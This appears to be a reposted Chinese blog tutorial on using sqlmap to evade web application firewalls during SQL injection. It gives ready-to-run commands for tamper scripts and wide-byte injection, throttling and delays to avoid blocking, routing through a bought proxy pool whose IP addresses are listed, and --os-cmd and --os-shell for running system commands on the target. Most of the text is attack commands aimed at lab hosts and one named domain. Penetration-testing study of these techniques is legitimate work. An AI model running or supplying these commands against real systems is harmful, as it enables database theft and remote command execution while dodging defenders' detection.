当前位置:网站首页>SQLMAP使用教程(四)实战技巧三之绕过防火墙

SQLMAP使用教程(四)实战技巧三之绕过防火墙

2022-07-07 03:22:00 Aτθ

目前很多网站都使用waf对网站进行保护,在渗透测试过程中,很多的操作都会被拦截,在测试SQL注入时,waf会对请求过来的流量进行拦截,
导致SQLMAP请求的内容无法到达目标,SQLMAP无法判断目标是否存在注入,waf对恶意的攻击请求进行拦截,拦截会拉入黑名单,导致攻击者
访问不到目标。无法进行安全检测。

一、查看temper模块

sqlmap --list-tamper

在这里插入图片描述

二、宽字节注入

sqlmap -u "http://192.168.127.131/sql/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 4 --current-user

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

三、设置线程大小

在遇到waf的时候,如果并发过大,会认为是cc攻击,ip会被封堵。

--threads=1 设置线程为1

四、设置http请求延时

--delay=DELAY 设置每个 HTTP请求的延迟秒数。

五、使用代理注入

sqlmap -u "http://192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1  --proxy=http://192.168.1.107:4455

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

六、使用代理池注入

购买代理池之后,获取代理保存到文件内,比如:proxy.txt

123.73.208.166:46603
123.73.63.29:46603
123.73.63.84:46603
112.123.40.42:40806
183.47.94.248:38090
121.237.149.88:13804
114.99.108.71:23359
123.73.209.246:46603
123.73.63.132:46603
119.55.253.202:39730
--proxy-file 从文件中加载代理列表。
sqlmap -u "http://192.168.0.136:7766/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 1 --proxy-file=proxy.txt

七、sqlmap命令执行

--os-cmd=OSCMD      执行操作系统命令
--os-shell          调出交互式操作系统 shell
注入点的当前用户是dba时,使用以上两个命令,一个是执行命令,一个是调用交互操作系统shell

1、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-cmd="net user"

2、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-shell
使用--os-shell命令会弹出一个交互shell的界面,可以输入命令,如果可以回显就会返回命令执行的信息。
原网站

版权声明
本文为[Aτθ]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_51730169/article/details/125630481